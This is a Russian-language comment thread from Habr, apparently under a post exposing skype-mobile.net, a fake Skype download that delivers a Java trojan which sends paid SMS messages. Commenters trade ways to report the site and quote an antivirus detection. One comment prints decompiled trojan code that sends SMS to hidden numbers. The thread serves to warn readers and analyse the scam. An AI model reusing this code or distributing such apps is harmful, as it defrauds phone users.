Комментарии 74
За что минус, анон?
Да сразу же видно, что лохотрон!
Ну, до меня дошло только после после запуска инсталлятора и вопроса системы — разрешать ли приложению отправлять SMS. На скотски сделанный сайт не обратил внимание — спешил быстрее что-то найти, про 23 Кб подумал, что инсталлятор будет качать остальное из сети. Слоупок, да.
Скайп на яве, ага…
если я Вас правильно понял — Вы сомневаетесь в наличии скайпа на яве?
если так то skype.com/intl/ru/download/skype/skypelite/
если так то skype.com/intl/ru/download/skype/skypelite/
Ну, вот и замена SMS шпионам:)
Стукнуть в абуз-тим гугла?
Телефон вроде спрашивает о доступе к SMS, или нет?
не все
* точнее в некоторых просто можно в настройках явы поставить опцию «можно всё» и он больше никогда ничего не спросит
Нокиа например не полволяет для неподписанных приложени ставить настройку «всегда разрешать». Меня лично это бесит, но в общем применительно к среднестатистическому пользователю это правильно.
А вообще, я думаю, что 90% пользователей телефонов не нужен Ява-функционал (как и ВАП, Sim-меню) и прочая зараза, которую производители в сговоре с операторами им подсовывют с целью развода на деньги.
А вообще, я думаю, что 90% пользователей телефонов не нужен Ява-функционал (как и ВАП, Sim-меню) и прочая зараза, которую производители в сговоре с операторами им подсовывют с целью развода на деньги.
На счет того, как проучить мошенников, на мой взгляд самый лучший вариант это написать непосредственно в тп скайпа. Ибо никто так сильно не захочет прикрыть эту «лавочку» как сами разработчики. Тем более возможностей у них намного больше чем у большинства.
p.s. пойду общаться с техподдержкой.
p.s. пойду общаться с техподдержкой.
Да уж… воистину ява универсальна и для айфонов, и для симбиана, и для винмобайла — всё один файл skypeMobile.jar :) Лишь бы скачали…
В Firefox: Help → Report Web Forgery…
Друзья — официальный сайт понадежнее будет
Хм… Не знаю у кого как, но у меня всегда по умолчанию стоит запрет на отправку сообщений из приложений. Я считаю, это лучшая защита. Ну а если уж пользователь сам нажал «Разрешить», то это смс-ка стоимостью 50-300 р, достаточная кара за глупость
Вы считаете что Firefox основной браузер и блокировка в нём данного сайта — решение всех проблем? Вы бы ещё предложили написать производителю телефона.
Нужно написать в Гугл, хостеру и регистратору.
Нужно написать в Гугл, хостеру и регистратору.
Речь не об этом, а о том что надо распиарасить паразитов :) Даже если и не самим лезть в драку, так хотя бы позвонить в милицию.
Firefox использует гугловскую систему предотвращения мошенничества.
То есть в Гугл сообщить проще всего из ff — нажимаешь, потом вводишь капчу, и всё готово.
Что не отменяет возможность/необходимость написать хостеру.
То есть в Гугл сообщить проще всего из ff — нажимаешь, потом вводишь капчу, и всё готово.
Что не отменяет возможность/необходимость написать хостеру.
FIREFOX: Справка — Сообщите о мошенническом веб-сайте — как раз и отправляет информацию в Гугл, вы бы сами попробовали перед тем как умничать.
Вы уже внесли свою лепту, у меня в гугле на запрос «skype windows mobile 6.3» этот пост вылетает вторым. А там синим по белому написано «Мошенники».
Написал в тп скайпа. будем ждать ответа.
Правда русскоговорящей поддержки у них нет.
Правда русскоговорящей поддержки у них нет.
На деле скачивается не клиент Skype, а приложение Java (23 Кб), которое в поддельном «процессе инсталляции» рассылает SMS на левые короткие номера, в результате чего с вашего счета снимаются деньги.
skypeMobile.jar 383 КБ?
Наказать их можно так
При попытке загрузки любого из приложений:
А сообщения о фишинговых сайтах через браузеры обычно не до чего не доводят…
Антивирус Касперского 6.0 для Windows Workstations
The requested URL mjava.mobi/11565/Skype_Mobile.jar is infected with Trojan-SMS.J2ME.Agent.l virus
А сообщения о фишинговых сайтах через браузеры обычно не до чего не доводят…
Откуда этот дистр? у меня качается skype-mobile.net/skypeMobile.jar 383 КБ
А в вашем, если покопаться jar'е, в m.class можно найти такие строчки
messageconnection_1 = ((MessageConnection) Connector.open(new StringBuffer().append(«sms://»).append(b[int_1]).toString()));
TextMessage textmessage_1 = ((TextMessage) ((MessageConnection) Connector.open(new StringBuffer().append(«sms://»).append(b[int_1]).toString())).newMessage(«text»));
textmessage_1.setAddress(new StringBuffer().append(«sms://»).append(b[int_1]).toString());
textmessage_1.setPayloadText(a[int_1]);
System.out.println("===> test start send");
messageconnection_1.send(textmessage_1);
System.out.println("===> send ok");
Таки да, что он отсылает. Получается Касперыч декомпилирует java классы и палит код?
А в вашем, если покопаться jar'е, в m.class можно найти такие строчки
messageconnection_1 = ((MessageConnection) Connector.open(new StringBuffer().append(«sms://»).append(b[int_1]).toString()));
TextMessage textmessage_1 = ((TextMessage) ((MessageConnection) Connector.open(new StringBuffer().append(«sms://»).append(b[int_1]).toString())).newMessage(«text»));
textmessage_1.setAddress(new StringBuffer().append(«sms://»).append(b[int_1]).toString());
textmessage_1.setPayloadText(a[int_1]);
System.out.println("===> test start send");
messageconnection_1.send(textmessage_1);
System.out.println("===> send ok");
Таки да, что он отсылает. Получается Касперыч декомпилирует java классы и палит код?
:) касперский просто уже знает сигнатуру файла
Откуда этот дистр?
Просто перешел по одной из ссылок, видимо там было перенаправление…
Скачалось такое же приложение, 383 КБ. По виду — обычный скайповский ява-апплет. На сенсорном экране не могу протестить — не реагирует.
Если кто-то отправил сообщение с троянского приложения — очень прошу скинуть мне информацию об отправленном сообщении. (нужен короткий номер и отправленный текст, всё должно быть в исходящих сообщениях) По возможности — можно указать свой номер телефона.
Я работаю в МегаФоне, связывался с нашими специалистами, которые занимаются блокировкой мошеннических номеров.
Если кто-то отправил сообщение с троянского приложения — очень прошу скинуть мне информацию об отправленном сообщении. (нужен короткий номер и отправленный текст, всё должно быть в исходящих сообщениях) По возможности — можно указать свой номер телефона.
Я работаю в МегаФоне, связывался с нашими специалистами, которые занимаются блокировкой мошеннических номеров.
На будущее — эти Ява-приложения слеплены обычно топорно, так что номер и сообщение отсылаемое хранятся внутри в конфиге (простом текстовом файле), так что не декомпилируя приложение, можно понять, что оно делает :)
По крайней мере, те, на которые я натыкался, не пытались ничего скрыть или зашифровать. Подозреваю, скоро школьники начнут менять код, чтобы не палиться антивирусами.
По крайней мере, те, на которые я натыкался, не пытались ничего скрыть или зашифровать. Подозреваю, скоро школьники начнут менять код, чтобы не палиться антивирусами.
Спасибо за «на будущее», но, как я уже сказал, мне скачалось обычное ява-приложение, подписанное скайпом, так что я бы с радостью посмотрел описываемый Вами конфиг, но его нет.
.jar — это ZIP по натуре, так что переименуйте в .zip и откройте его WinRAR'ом :) Ну или если у вас Тотал Коммандер, просто жмите Ctrl + PgDn — он вроде при этом откроет его как архив. Там где-то и лежит конфиг.
Ну и плюс в файлах *.class (компилированный ява-код) можно будет увидеть строчки типа «sms», «MessageConnection» и т.д.
Ну и плюс в файлах *.class (компилированный ява-код) можно будет увидеть строчки типа «sms», «MessageConnection» и т.д.
И все же отправил через фаерфокс! ) я думаю обратят внимание если будет пару десятков жалоб
Вот правильный линк для abuse AdSense/AdWords: adwords.google.com/support/aw/bin/request.py?display=form&contact_type=tiaff
Собственно уже отписался туда. Думаю, что не лишним будет повторить.
Собственно уже отписался туда. Думаю, что не лишним будет повторить.
Грустно… Когда ж мы уже будем жить в мире, в котором человек здравый и трезвый не будет задумываться, как прищучить мошейника, а спокойно пойдет себе с этим в свое местное отделение милиции и будет уверен, что уж там-то точно разберутся… :) Вне зависимости от того, где эти нехорошие люди хостятся и в какой зоне у них домен…
Мечты мечты…
Мечты мечты…
У, да этому лохотрону уже несколько мнсяцев. Трансформируется только под разные программы и приложения. Зайдите в Гугл и наберите Jimm — и попробуйте что-нибудь скачать из предложенного в адвордсе. Результат будет тот же — пойдут СМС на разные номера.
Ну вот и все
Если кто-то (вдруг!) отправил смс — посмотрите в детальке короткий номер и пришлите, пожалуйста, мне.
По крайней мере, со стороны одного оператора прикроем.
По крайней мере, со стороны одного оператора прикроем.
Для обладателей FF и IE могу порекомендовать ознакомиться с местными топиками mihteh.habrahabr.ru/blog/40192/ и shifttstas.habrahabr.ru/blog/72045/
Цитата из одного из данных топиков:
«WOT – это сообщество, посвятившее себя поддержке безопасного использования Интернета. Название является сокращением от «Web of Trust» (Сеть доверия). Цель – сделать Интернет безопаснее, позволив пользователям обмениваться опытом, связанным с веб-сайтами и предлагаемыми ими услугами.»
Цитата из одного из данных топиков:
«WOT – это сообщество, посвятившее себя поддержке безопасного использования Интернета. Название является сокращением от «Web of Trust» (Сеть доверия). Цель – сделать Интернет безопаснее, позволив пользователям обмениваться опытом, связанным с веб-сайтами и предлагаемыми ими услугами.»
> Если кто-то может посоветовать, каким образом лучше прищучить мошенников — пишите в комментариях.
Прищучить сотовых операторов и аггрегаторов, но вы же понимаете. насколько это маловероятно.
Прищучить сотовых операторов и аггрегаторов, но вы же понимаете. насколько это маловероятно.
офф ответ от тех.поддержки скайп
Original Message Follows:
— Name: Anatoliy Mladshev
Skype Name: mladshev.a
E-mail: mladshev.a@gmail.com
Topic: Skype Products (Skype for SIP, Subscriptions, Online
number, SMS, Voicemail, etc.)
Subtopic: Extras (games, productivity, business, etc.)
Subject: skype fake site.
Message:
— Good day, dear developers.
Here's the problem.
We founded the site, where people can download fake skype product
skype-mobile.net
It steals money from users moblie phone.
Can u do some thing with that? It can the big problem for your
reputation.
Hello Anatoliy,
Thank you for contacting Skype Support.
Thank you for reporting this site.
The site that you have provided is now under investigation.
We appreciate your vigilance and thank you for your feedback.
If you'd like to get more out of Skype, check out our great call
packages — www.skype.com/go/getmore/
Should you need more assistance, feel free to contact us again; we will
be glad to help.
Best regards,
Gabriella
Skype Customer Support
Visit www.skype.com for latest news, updates and tips.
Original Message Follows:
— Name: Anatoliy Mladshev
Skype Name: mladshev.a
E-mail: mladshev.a@gmail.com
Topic: Skype Products (Skype for SIP, Subscriptions, Online
number, SMS, Voicemail, etc.)
Subtopic: Extras (games, productivity, business, etc.)
Subject: skype fake site.
Message:
— Good day, dear developers.
Here's the problem.
We founded the site, where people can download fake skype product
skype-mobile.net
It steals money from users moblie phone.
Can u do some thing with that? It can the big problem for your
reputation.
Hello Anatoliy,
Thank you for contacting Skype Support.
Thank you for reporting this site.
The site that you have provided is now under investigation.
We appreciate your vigilance and thank you for your feedback.
If you'd like to get more out of Skype, check out our great call
packages — www.skype.com/go/getmore/
Should you need more assistance, feel free to contact us again; we will
be glad to help.
Best regards,
Gabriella
Skype Customer Support
Visit www.skype.com for latest news, updates and tips.
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Мошенники: skype-mobile.net